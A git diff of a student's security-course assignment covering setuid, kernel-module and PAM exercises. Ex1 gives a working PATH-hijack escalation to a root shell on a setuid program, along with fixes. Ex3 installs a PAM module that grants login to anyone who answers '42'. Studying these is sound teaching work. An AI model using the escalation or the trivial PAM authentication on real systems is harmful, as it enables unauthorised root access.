7 files changed, 151 insertions, 0 deletions

diff --git a/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt b/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt
new file mode 100644
index 0000000..28c5e20
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt
@@ -0,0 +1,21 @@
+a
+    Using strace -feprocess ./showdate we see the following interesting calls:
+        execve("/bin/sh", ["sh", "-c", "date"], [/* 37 vars */])
+        execve("/bin/date", ["date"], [/* 37 vars */])
+
+b
+    $ ln -s /bin/sh date
+    $ export PATH=.:$PATH
+    $ ./showdate
+    # id
+    uid=0(root) gid=0(root) groups=0(root),27(sudo),1001(camil)
+
+c
+    - Simply don't use execve for something as simple as this.
+    - The currently used system call is:
+        execve("/bin/sh", ["sh, "-c", "date"], [/* 37 vars */])
+      This could be changed to:
+        execve("/bin/date", ...)
+      A nonprivileged user cannot change /bin/date.
+    - Drop privileges before executing execve.
+
diff --git a/CamilStaps-s4498062-Assignment-2/ex2/Makefile b/CamilStaps-s4498062-Assignment-2/ex2/Makefile
new file mode 100644
index 0000000..a87a542
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex2/Makefile
@@ -0,0 +1,8 @@
+obj-m += hello-cr4.o
+
+all:
+	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
+
diff --git a/CamilStaps-s4498062-Assignment-2/ex2/ex2.txt b/CamilStaps-s4498062-Assignment-2/ex2/ex2.txt
new file mode 100644
index 0000000..35afd58
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex2/ex2.txt
@@ -0,0 +1,20 @@
+a
+    According to https://en.wikipedia.org/wiki/Control_register#CR4, the SMAP and SMEP bits are used to protect ring 0.
+    If writing to CR4 would be allowed, we could disable this protection, and access kernel space data (e.g.)
+
+b
+    0x40050e <main+8>           mov     %cr4,%rax
+
+    This attempts to move the RAX register to the CR4 register, i.e. to write to CR4.
+
+c
+    Done. I suppose it isn't necessary to give you the code or results, as all was needed was copying from the given website.
+
+d
+    See hello-cr4.c and Makefile.
+    
+    # make
+    [..]
+    # insmod hello-cr4.ko
+    [15892.352286] Hello world! CR4 =         7f0
+
diff --git a/CamilStaps-s4498062-Assignment-2/ex2/hello-cr4.c b/CamilStaps-s4498062-Assignment-2/ex2/hello-cr4.c
new file mode 100644
index 0000000..9db671d
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex2/hello-cr4.c
@@ -0,0 +1,22 @@
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/init.h>
+
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("Camil Staps");
+MODULE_DESCRIPTION("A Simple Hello World module");
+
+static int __init hello_init(void) {
+    unsigned long long result;
+    __asm__("movq %%cr4, %%rax\n" : "=a"(result));
+    printk(KERN_INFO "Hello world! CR4 = %11x\n", result);
+    return 0;
+}
+
+static void __exit hello_cleanup(void) {
+    printk(KERN_INFO "Cleaning up module.\n");
+}
+
+module_init(hello_init);
+module_exit(hello_cleanup);
+
diff --git a/CamilStaps-s4498062-Assignment-2/ex3/Makefile b/CamilStaps-s4498062-Assignment-2/ex3/Makefile
new file mode 100644
index 0000000..7ff3de0
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex3/Makefile
@@ -0,0 +1,5 @@
+all:
+        gcc -fPIC -DPIC -shared -rdynamic -o pam_questions.so pam_questions.c
+        cp pam_questions.so /lib/security
+        chown root:root /lib/security/pam_questions.so
+        chmod 755 /lib/security/pam_questions.so
diff --git a/CamilStaps-s4498062-Assignment-2/ex3/login b/CamilStaps-s4498062-Assignment-2/ex3/login
new file mode 100644
index 0000000..3e1c3cb
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex3/login
@@ -0,0 +1,3 @@
+# PAM configuration file
+auth sufficient pam_questions.so
+
diff --git a/CamilStaps-s4498062-Assignment-2/ex3/pam_questions.c b/CamilStaps-s4498062-Assignment-2/ex3/pam_questions.c
new file mode 100644
index 0000000..b93dc4e
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-2/ex3/pam_questions.c
@@ -0,0 +1,72 @@
+/* Source code from http://www.rkeene.org/projects/info/wiki/222, adapted by Camil Staps */
+
+/* Define which PAM interfaces we provide */
+#define PAM_SM_ACCOUNT
+#define PAM_SM_AUTH
+#define PAM_SM_PASSWORD
+#define PAM_SM_SESSION
+
+/* Include PAM headers */
+#include <security/pam_appl.h>
+#include <security/pam_modules.h>
+
+/* Other headers */
+#include <time.h>
+#include <stdlib.h>
+#include <stdio.h>
+    
+/* Our questions and answers */
+const char * const q[5] = {
+    "6*7",
+    "the answer to life the universe and everything",
+    "'forty two' in numbers",
+    "the meaning of 'efa-polo roa' in Malagasi",
+    "not 54" };
+const char a[5] = {42, 42, 42, 42, 42};
+
+/* PAM entry point for session creation */
+int pam_sm_open_session(pam_handle_t *pamh, int flags, int argc, const char **argv) {
+    return(PAM_IGNORE);
+}
+
+/* PAM entry point for session cleanup */
+int pam_sm_close_session(pam_handle_t *pamh, int flags, int argc, const char **argv) {
+    return(PAM_IGNORE);
+}
+
+/* PAM entry point for accounting */ 
+int pam_sm_acct_mgmt(pam_handle_t *pamh, int flags, int argc, const char **argv) {
+    return(PAM_IGNORE);
+}   
+    
+/* PAM entry point for authentication verification */
+int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) {
+    const char* username;
+    pam_get_user(pamh, &username, NULL);
+
+    srand(time(NULL));
+    int r = rand() % 5;
+    printf("What is %s? ", q[r]);
+    int resp;
+    scanf("%d", &resp);
+    
+    if (resp == a[r]) {
+        return(PAM_SUCCESS);
+    } else {
+        return(PAM_AUTH_ERR);
+    }
+}
+
+/*
+  PAM entry point for setting user credentials (that is, to actually
+  establish the authenticated user's credentials to the service provider)
+*/
+int pam_sm_setcred(pam_handle_t *pamh, int flags, int argc, const char **argv) {
+    return(PAM_IGNORE);
+}
+
+/* PAM entry point for authentication token (password) changes */
+int pam_sm_chauthtok(pam_handle_t *pamh, int flags, int argc, const char **argv) {
+    return(PAM_IGNORE);
+}
+